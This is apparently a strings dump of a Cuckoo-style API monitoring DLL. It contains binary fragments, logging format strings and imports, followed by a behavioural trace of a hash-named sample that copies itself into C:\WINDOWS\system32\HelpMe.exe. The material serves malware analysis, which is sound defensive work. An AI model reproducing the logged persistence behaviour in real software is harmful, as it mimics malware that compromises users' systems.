@Io"G.
HHtXHBt
s^TS18
?If90t
BADDW<]V"
dV fY)
q"KN4T_,O
t_0fY)+
"K^]b6Kov`f
g@0I2.
">LE35
V B<S$>L5
bMADD5Z=3W</
5Z=saU_;A`f
y;VF$S
LE$P1Q
uTVWhC
QCj@j ^V
i_H1CSu
ST\P"EQ
Pou6Wx	u
< tK<	tG
^VhUNMP
A]8N\TP
C>UEQ2
VGALFP
HHtYHHq
vLIV'Z
Get>emue
w?rtMP
"$~U=P#Q
jmh4(k
\]0tt8{ud
j&hH(3
Z(!JIH
U.*?>=u
 L_43N
].#GFE
(LV<;F
ccd Cl
t,qrd	l
[%<hsp
VD>s0R
(ctrUc
9>4?'#r|
d",VwJ
n`Name
WSBESS
BddA54
08xH,Hd
6OeJ(#%s
es",HK
t	WFpG
e`X$M7P <
X{",&l
_-s"+"P~J$
**,"QU6Y-
>KG&DJ
}*%w",W?
zvIce;{
.mrv)c
X{",&%
	[erVi
Mp%08|W6JtRQu
iJp3Qd
Q*","`&
Xl","e
C8x-08
1]RE#,W8D
_$"Ckn
zvikeX$XD 2(
}XJD%%
Q*GAVL H-
&&0,du8MC
_*/"wS
Q*A4S$APG2
)ZK7B<
_$#EbM
>KG&IJ
/MbY8J
8FA'S+7eZU
M0x#,"
_-s",#P~J
>zeaue>
Q*lpQu
X{",&%
P6%s"<W{
W;J2VK\
_dpSuB>r
/ML!E+
_[V6T-
X{#Y5M
/ML!E=_
_[]6T-G
>Il*Z)
**,"FQ<V=
%>%wSW
/?2Eq%
/d Eq%
/|rSu6
!B<qT0
~b|#55
jY#ub(
h	(V2}
F-),.t
(pr-2!
]v?bu"
3!!#<s
.MT	-2
h$i^d=
y}}?5!
Z!#O^T
vy#r2~
|H5,.w
7)4#<p
x+Oid=
vI#r2~
|d4,.w
!V%f#<
zr(,.w
7b|#|"
bCr-2>
Q%"ds&
%0u1(*
8*uvcp
ti5uu 
+a'r2~
.+2E`d
tM`'y2
@ <J	W <J!e",
iG?Ms*,"
m`+oema
B/#D"*,"
#<Jnmtw
C$U!N]E
$cJ,*%d
iG?Ms*
TB$Dgwn
2F#Md*,"
#V)IDUR
r=V%{"
{ eide
$cJ,*%d
2&n	dDib
#<JFIIL
ME:E*,"
#<JlxBa
#<JRmad
TS+E[S"
e=V0p%0
vcJ,*dw
,.Xx-08
-2Md*,"
#x.ide-
#D"Lel
","lpFileName->%s"
"%s","%d","%s","%d","filesystem","DeleteFileW","SUCCESS","","lpFileName->%ws"
"%s","%d","%s","%d","filesystem","DeleteFileW","FAILURE","","lpFileName->%ws"
"%s","%d","%s","%d","filesystem","MoveFileExW","SUCCESS","","lpExistingFileName->%s","lpNewFileName->%s"
EWX_LOGOFF
"%s","%d","%s","%d","filesystem","MoveFileExW","FAILURE","","lpExistingFileName->%s","lpNewFileName->%s"
EWX_REBOOT
"%s","%d","%s","%d","filesystem","MoveFileExW","SUCCESS","","lpExistingFileName->%ws","lpNewFileName->%ws"
"%s","%d","%s","%d","filesystem","MoveFileExW","FAILURE","","lpExistingFileName->%ws","lpNewFileName->%ws"
"%s","%d","%s","%d","filesystem","MoveFileWithProgressA","SUCCESS","","lpExistingFileName->%s","lpNewFileName->%s"
"%s","%d","%s","%d","filesystem","MoveFileWithProgressA","FAILURE","","lpExistingFileName->%s","lpNewFileName->%s"
"%s","%d","%s","%d","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->%ws","lpNewFileName->%ws"
"%s","%d","%s","%d","filesystem","MoveFileWithProgressW","FAILURE","","lpExistingFileName->%ws","lpNewFileName->%ws"
"%s","%d","%s","%d","filesystem","CopyFileA","SUCCESS","","lpExistingFileName->%s","lpNewFileName->%s"
GENERIC_WRITE
INTERNET_FLAG_EXISTING_CONNECT
EWX_RESTARTAPPS
SHTDN_REASON_MAJOR_HARDWARE
"%s","%d","%s","%d","filesystem","CopyFileA","FAILURE","","lpExistingFileName->%s","lpNewFileName->%s"
SERVICE_CONTROL_NETBINDENABLE
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
SHTDN_REASON_MAJOR_OPERATINGSYSTEM
"%s","%d","%s","%d","filesystem","CopyFileW","SUCCESS","","lpExistingFileName->%ws","lpNewFileName->%ws"
SHTDN_REASON_MAJOR_OTHER
"%s","%d","%s","%d","filesystem","CopyFileW","FAILURE","","lpExistingFileName->%ws","lpNewFileName->%ws"
SHTDN_REASON_MAJOR_POWER
"%s","%d","%s","%d","filesystem","CopyFileExA","SUCCESS","","lpExistingFileName->%s","lpNewFileName->%s"
SHTDN_REASON_MAJOR_SOFTWARE
"%s","%d","%s","%d","filesystem","CopyFileExA","FAILURE","","lpExistingFileName->%s","lpNewFileName->%s"
SHTDN_REASON_MAJOR_SYSTEM
"%s","%d","%s","%d","filesystem","CopyFileExW","SUCCESS","","lpExistingFileName->%ws","lpNewFileName->%ws"
"%s","%d","%s","%d","filesystem","CopyFileExW","FAILURE","","lpExistingFileName->%ws","lpNewFileName->%ws"
"%s","%d","%s","%d","filesystem","ReplaceFileA","SUCCESS","","lpReplacedFileName->%s","lpReplacementFileName->%s"
WH_CALLWNDPROCRET
"%s","%d","%s","%d","filesystem","ReplaceFileA","FAILURE","","lpReplacedFileName->%s","lpReplacementFileName->%s"
WH_DEBUG
"%s","%d","%s","%d","filesystem","ReplaceFileW","SUCCESS","","lpReplacedFileName->%ws","lpReplacementFileName->%ws"
"%s","%d","%s","%d","filesystem","ReplaceFileW","FAILURE","","lpReplacedFileName->%ws","lpReplacementFileName->%ws"
"%s","%d","%s","%d","device","DeviceIoControl","FAILURE","","hDevice->0x%08x","dwIoControlCode->0x%08x","lpInBuffer->0x%08x","nInBufferSize->0x%08x","lpOutBuffer->0x%08x","nOutBufferSize->0x%08x","lpBytesReturned->0x%08x","lpOverlapped->0x%08x"
"%s","%d","%s","%d","device","DeviceIoControl","SUCCESS","","hDevice->0x%08x","dwIoControlCode->0x%08x","lpInBuffer->0x%08x","nInBufferSize->0x%08x","lpOutBuffer->0x%08x","nOutBufferSize->0x%08x","lpBytesReturned->0x%08x","lpOverlapped->0x%08x"
GENERIC_READ
GENERIC_READ | GENERIC_WRITE
SERVICE_DEMAND_START
SERVICE_SYSTEM_START
SC_MANAGER_ENUMERATE_SERVICE
SC_MANAGER_QUERY_LOCK_STATUS
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_QUERY_CONFIG
SERVICE_QUERY_STATUS
SERVICE_STOP
SERVICE_USER_DEFINED_CONTROL
READ_CONTROL
GENERIC_READ
SERVICE_CONTROL_NETBINDREMOVE
SERVICE_CONTROL_PAUSE
SERVICE_CONTROL_STOP
READ_CONTROL
SEMAPHORE_ALL_ACCESS
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_KEEP_CONNECTION
INTERNET_FLAG_NO_AUTH
INTERNET_FLAG_NO_AUTO_REDIRECT
INTERNET_FLAG_NO_CACHE_WRITE
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_PRAGMA_NOCACHE
INTERNET_FLAG_RAW_DATA
INTERNET_FLAG_RELOAD
INTERNET_FLAG_SECURE
0x%08x
EWX_POWEROFF
EWX_SHUTDOWN
0x%08x
SHTDN_REASON_MAJOR_APPLICATION
SHTDN_REASON_MAJOR_LEGACY_API
0x%08x
WH_CALLWNDPROC
WH_CBT
WH_FOREGROUNDIDLE
WH_GETMESSAGE
WH_JOURNALPLAYBACK
WH_JOURNALRECORD
WH_KEYBOARD
WH_KEYBOARD_LL
WH_MOUSE
WH_MOUSE_LL
WH_MSGFILTER
WH_SHELL
WH_SYSMSGFILTER
kernel32.dll
CreateProcessInternalW
C:\cuckoo\
%slogs\%d.csv
RSDSHGjl
C:\Documents and Settings\emartinez\Escritorio\cmonitor\Release\cmonitor.pdb
ExitProcess
CreateMutexW
CopyFileExW
CreateRemoteThread
WriteFile
LoadLibraryW
ReadProcessMemory
TerminateProcess
ReplaceFileW
ReadFile
CreateFileW
OpenMutexW
GetProcAddress
ReadFileEx
VirtualAllocEx
LoadLibraryA
DeviceIoControl
IsDebuggerPresent
WinExec
WriteFileEx
DeleteFileW
GetCurrentProcessId
MoveFileWithProgressW
WriteProcessMemory
CreateThread
WideCharToMultiByte
GetSystemTime
GetCurrentProcess
Process32First
WaitForSingleObject
GetLastError
Process32Next
GetExitCodeThread
GetModuleHandleA
CreateToolhelp32Snapshot
DuplicateHandle
CloseHandle
MultiByteToWideChar
CreateFileA
SetFilePointer
WaitNamedPipeW
KERNEL32.dll
FindWindowA
SetWindowsHookExW
SetWindowsHookExA
ExitWindowsEx
FindWindowW
USER32.dll
CreateServiceW
OpenServiceA
DeleteService
OpenSCManagerW
OpenServiceW
RegSetValueExA
RegCreateKeyExW
CreateServiceA
RegQueryValueExW
RegDeleteKeyA
RegDeleteKeyW
StartServiceA
RegCreateKeyExA
RegOpenKeyExA
StartServiceW
OpenSCManagerA
RegEnumValueW
RegOpenKeyExW
ControlService
RegEnumKeyExW
RegSetValueExW
ADVAPI32.dll
ShellExecuteExW
ShellExecuteExA
SHELL32.dll
WS2_32.dll
InternetOpenUrlW
WININET.dll
URLDownloadToFileW
urlmon.dll
GetTickCount
VirtualProtect
OutputDebugStringA
HeapFree
GetCurrentThreadId
DecodePointer
GetCommandLineA
HeapReAlloc
UnhandledExceptionFilter
SetUnhandledExceptionFilter
EncodePointer
IsProcessorFeaturePresent
HeapAlloc
HeapCreate
HeapDestroy
RaiseException
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
InterlockedIncrement
GetModuleHandleW
SetLastError
InterlockedDecrement
SetHandleCount
GetStdHandle
InitializeCriticalSectionAndSpinCount
GetFileType
GetStartupInfoW
DeleteCriticalSection
GetModuleFileNameA
FreeEnvironmentStringsW
GetEnvironmentStringsW
QueryPerformanceCounter
GetSystemTimeAsFileTime
GetConsoleCP
GetConsoleMode
EnterCriticalSection
LeaveCriticalSection
GetCPInfo
GetACP
GetOEMCP
IsValidCodePage
HeapSize
GetModuleFileNameW
RtlUnwind
SetStdHandle
WriteConsoleW
LCMapStringW
GetStringTypeW
FlushFileBuffers
0123456789abcdef00
##%%&'%#&'&'
 !"#$%&'()*+,-./0123456789
 !"#$%&'()*+,-./
 !"#$%&'()*+,-./012345678
 !"#$%&'()*+
,-./0123456789:;
 !"#$%&'(
$%&'()*+,-./0123
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGXZ
!"#$%&'()*+,-.
/0123456789
<=>?@ABCDE
FGHIJKLMNO
PQRSTUVWXY
 !"#$%&'()
-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdef
ghijklmnopqrstuvwxyz{|}~
 !"#$%&
'()*+,-
./01234
56789:;
<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`
abcdefghijklmnopqrstuvwxyz{|}~
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVtype_info@@
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
31Z1c1w3
6.6?6P6a6r6
9$:E:T:
<(=D=\=`=d=h=l=
:D;H;L;P;T;X;\;`;
3.4Q4X4@5
3`3d3h3l3p3t3x3|3
4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
41585P5T5X5
70:4:8:<:@:D:H:L:P:T:X:\:`:
=%=j>t>
242;2C2H2L2P2y2
2*3034383<3
3'4Y4`4d4h4l4p4t4x4|4
7M7S7X7`7p7z7
7;8s8x8
9L9R9X9m9
9&:S:#;);5;l;
<Y=a=v=
>K?Z?u?
>!>g>m>w>o?{?
0o1t1}1
122a2g2v2
2/3;3B3N3T3`3f3o3u3~3
444t4z4
576G6M6Y6_6o6u6{6
7!7&7,70767;7A7F7U7k7q7y7~7
838<8H8
:3:>:X:c:k:{:
;#<h<o<
>(>M>X>g>
2"2'2H2M2q2
6*6S6[6
020D0J0d0s0
1$1.1T1
5)535F5j5
858N8j8s8y8
<C<I<O<_<j<~=
:B;b;g;
<[<s<}<
>1>?>E>h>o>
0?0E0M0
0_1h1n1
455H5`5
7!8L8m8v8
2*2<2N2`2r2
3 3'3.363>3F3R3[3`3f3p3y3
4&4+4<4D4J4T4Z4d4j4t4}4
7U8o8x8
020T0a0x0
2:2Z2z2
3:3Z3z3
5!5J5j5
606S6v6
6"7E7h7
878W8w8
9&9I9l9
:2:O:l:
;*;J;g;
<-<M<m<
=3=S=s=
?(?C?j?
*0J0j0
202P2k2
3#3@3[3
5(5/5=5D5R5Y5g5n5|5
6$6+696@6N6U6c6j6x6
7 7'757<7J7Q7_7f7t7{7
8#81888F8M8[8b8p8w8
8%9+999C9K9Q9X9f9l9s9
:#:):0:>:D:K:Y:_:f:t:z:
;#;1;7;>;L;R;Y;g;m;t;
<!<'<.<<<B<I<W<]<d<r<x<
=!=/=5=<=J=P=W=e=k=r=
>">(>/>=>C>J>X>^>e>s>y>
>(?.?3?[?m?
0%0+050L0
1%1+151L1
2&2J2P2V2`2w2
3&3,313;3\3b3g3q3
4#4)434P4V4[4e4{4
5A5G5L5V5w5}5
5%6I6O6U6_6
6%7I7O7U7_7
778q8w8|8
:H;N;T;^;
<8=>=D=N={=
0 0*0S0Y0^0h0~0#1]1c1h1r1
4$4.4O4U4Z4d4z4
4#5]5c5i5s5
8%8+858V8\8b8l8
;$;*;0;:;P;U;g;
<N<T<Z<d<
=%>+>1>;>Q>V>h>$?
0^1d1i1s1
1A2b2h2n2x2
4%424L4r4
4-5l5r5x5
93999>9K9d9
:P:V:\:f:
:M;r;x;};
<L<-=3=9=C=Z=
22282>2K2e2
7?7E7J7T7j7
8M8S8X8b8
8Q9u9{9
=)=F=L=Q=[=q=
>B>H>M>W>x>~>
>-?R?X?]?g?
=0b0h0m0w0
0M1r1x1}1
4V4\4a4k4
5 6'6,6P6W6\6
7@7G7L7p7w7|7
80878<8`8g8l8
8 9'9,9P9W9\9
:@:G:L:p:w:|:
;0;7;<;`;g;l;
; <'<,<P<W<\<
=@=G=L=p=w=|=
>0>7><>`>g>l>
> ?'?,?P?W?\?
0@0G0L0p0w0|0
10171<1`1g1l1
1 2'2,2P2W2\2
3@3G3L3p3w3|3
2 2$2(2,2024282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2
3 3$3(3,3034383<3H3L3P3T3`3d3
6$6,646<6D6L6
5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5
6 6$6(6,6064686<6@6D6H6
5 585<5T5d5h5|5
6$6,6@6`6|6
707P7p7
808L8P8p8
:<:@:H:L:
:8;<;@;D;H;L;P;X;\;
<l<p<t<x<|<
=$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>
?0?4?<?@?l?p?x?|?
\0`0d0h0l0p0t0x0|0
1$2(2,2024282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2
3,30383<3h3l3t3x3|4
5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5l5p5\6`6d6h6l6p6t6x6|6
74787@7D7p7t7|7
: :$:(:,:0:4:8:<:@:D:H:L:P:T:(;,;x;|;
< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<\<`<d<h<l<p<t<x<|<
=(>,>0>4>8><>@>D>L>P>
?(?0?4?
4080<0@0D0H0L0P0X0\0x0
2 2$2(2,20242<2@2
3 3(3,3p3t3x3
3 4$4(40444x4|4
4(5,50585<5
5064686@6D6
687<7@7H7L7
7084888@8D8
889<9@9H9L9
9@:D:H:P:T:
;@<D<H<P<T<
=H=L=P=X=\=
>P>T>X>`>d>
?X?\?`?h?l?
0`0d0h0p0t0
1 1$1(10141x1|1
1(2,20282<2
2H3L3P3T3\3`3
3h4l4p4t4|4
4L5P5T5\5`54686<6@6D6H6L6P6X6\6
7T7X7`7d7
8 8$8(8,80848<8@8
8D9H9L9P9T9\9`9
90:4:8:<:D:H:
:0;4;<;@;
;4<8<<<D<H<
< =$=,=0=t=x=|=
>L>P>T>\>`>
> ?$?(?0?4?x?|?
0P1T1X1\1`1h1l1
2 2$2\2`2h2l2
3`3d3h3p3t3
4 4$4h4l4p4x4|4
5 5(5,5p5t5x5
5 6$6(60646x6|6
6074787<7@7D7H7L7T7X7
9<:@:D:H:L:P:X:\:
= =$=(=0=4=
?`?d?h?l?t?x?
0 0$0(0,0004080@0D0
1P1T1\1`1
2L2P2X2\2
3H3L3T3X3
4D4H4P4T4
4@5D5L5P5|5
6X6\6d6h6
7l7p7t7|7
8$8(8l8p8x8|8
9 9$9h9l9t9x9
:0:8:<:h:p:t:|;
<0<4<<<@<l<p<x<|<
=D=H=P=T=
>H>P>T>
>(?0?4?`?h?l?
0@0H0L0x0
0 1(1,1X1`1d1
282@2D2p2x2|2
3 3$3P3X3\3
40484<4h4p4t4
5L5P5X5\5
5$6(60646l6p6x6|6
7D7H7P7T7
8 8(8,8d8h8p8t8
9<9@9H9L9
:0:8:<:h:p:t:
;<;@;H;L;
< <$<\<`<h<l<
<4=8=@=D=
=8><>@>H>L>x>
>,?0?8?<?h?p?t?
0H0P0T0
1`1d1h1p1t1
2 2$2h2l2p2x2|2
3 3(3,3p3t3x3
3 4$4(40444x4|4
6 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6
7 7$7(7,7074787<7@7D7H7L7P7T7X7\7`7d7h7p7t7
7D8H8L8P8X8\8
8d9h9l9p9t9x9
;H<L<P<T<\<`<
=h=l=p=t=|=
=P>T>X>\>d>h>
? ?$?(?,?0?4?<?@?
0 0$0(0,0004080@0D0
1 1$1(1,1014181<1D1H1p2t2|3
5P6T6X6\6`6d6l6p6L<P<T<X<\<`<d<h<l<p<t<x<|<
= =$=(=,=0=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>
? ?$?(?,?0?4?8?<?@?D?H?L?P?T?X?\?`?d?h?l?p?t?x?|?
t9x9|9
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;\;`;d;h;l;p;t;x;|;
< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<\<`<d<h<l<p<t<x<|<
= =$=(=,=0=4=8=<=@=H=L=
X6X7\7`7d7h7l7p7t7x7|7
8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8
9(989H9X9|9
;(;,;0;4;8;<;@;D;H;L;P;
eekxYC.dll
"20190111212121.331","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","memory","VirtualAllocEx","SUCCESS","0x00150000","th32ProcessID->1748","szExeFile->9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","lpAddress->0x00000000","dwSize->6144","flAllocationType->0x00001000","flProtect->0x00000004"
"20190111212121.331","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","memory","VirtualAllocEx","SUCCESS","0x00260000","th32ProcessID->1748","szExeFile->9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","lpAddress->0x00000000","dwSize->377102","flAllocationType->0x00001000","flProtect->0x00000004"
"20190111212121.341","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","memory","VirtualAllocEx","SUCCESS","0x00160000","th32ProcessID->1748","szExeFile->9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","lpAddress->0x00000000","dwSize->5390","flAllocationType->0x00001000","flProtect->0x00000004"
"20190111212121.341","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","memory","VirtualAllocEx","SUCCESS","0x00160000","th32ProcessID->1748","szExeFile->9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","lpAddress->0x00000000","dwSize->9998","flAllocationType->0x00001000","flProtect->0x00000004"
"20190111212121.341","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","memory","VirtualAllocEx","SUCCESS","0x00160000","th32ProcessID->1748","szExeFile->9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","lpAddress->0x00000000","dwSize->26674","flAllocationType->0x00001000","flProtect->0x00000004"
"20190111212121.351","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExA","FAILURE","","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Borland\Locales"
"20190111212121.351","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExA","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Borland\Locales"
"20190111212121.351","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExA","FAILURE","","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Borland\Delphi\Locales"
"20190111212121.351","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","memory","VirtualAllocEx","SUCCESS","0x00150000","th32ProcessID->1748","szExeFile->9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","lpAddress->0x00000000","dwSize->1048576","flAllocationType->0x00002000","flProtect->0x00000001"
"20190111212121.351","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","memory","VirtualAllocEx","SUCCESS","0x00150000","th32ProcessID->1748","szExeFile->9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","lpAddress->0x00150000","dwSize->16384","flAllocationType->0x00001000","flProtect->0x00000004"
"20190111212121.361","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","memory","VirtualAllocEx","SUCCESS","0x00250000","th32ProcessID->1748","szExeFile->9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","lpAddress->0x00000000","dwSize->4096","flAllocationType->0x00001000","flProtect->0x00000040"
"20190111212121.361","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190111212121.361","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","device","DeviceIoControl","SUCCESS","","hDevice->0x00000034","dwIoControlCode->0x00390008","lpInBuffer->0x77e46318","nInBufferSize->0x00000100","lpOutBuffer->0x0012fc34","nOutBufferSize->0x00000100","lpBytesReturned->0x0012fc2c","lpOverlapped->0x00000000"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x000000a0","lpFileName->C:\9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","dwDesiredAccess->GENERIC_READ"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000a0","nNumberOfBytesToRead->268"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x00000098","lpFileName->C:\WINDOWS\system32\HelpMe.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->1748","szExeFile->9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000a0","nNumberOfBytesToRead->61440"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000098","nNumberOfBytesToWrite->61440"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000a0","nNumberOfBytesToRead->61440"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000098","nNumberOfBytesToWrite->61440"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000a0","nNumberOfBytesToRead->61440"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000098","nNumberOfBytesToWrite->61440"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000a0","nNumberOfBytesToRead->32094"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000098","nNumberOfBytesToWrite->32094"
"20190111212121.391","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","synchronization","OpenMutexW","SUCCESS","0x000000ac","dwDesiredAccess->0x00120001","lpName->ShimCacheMutex"
"20190111212121.391","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->0x000000bc","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190111212121.391","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->Cache"
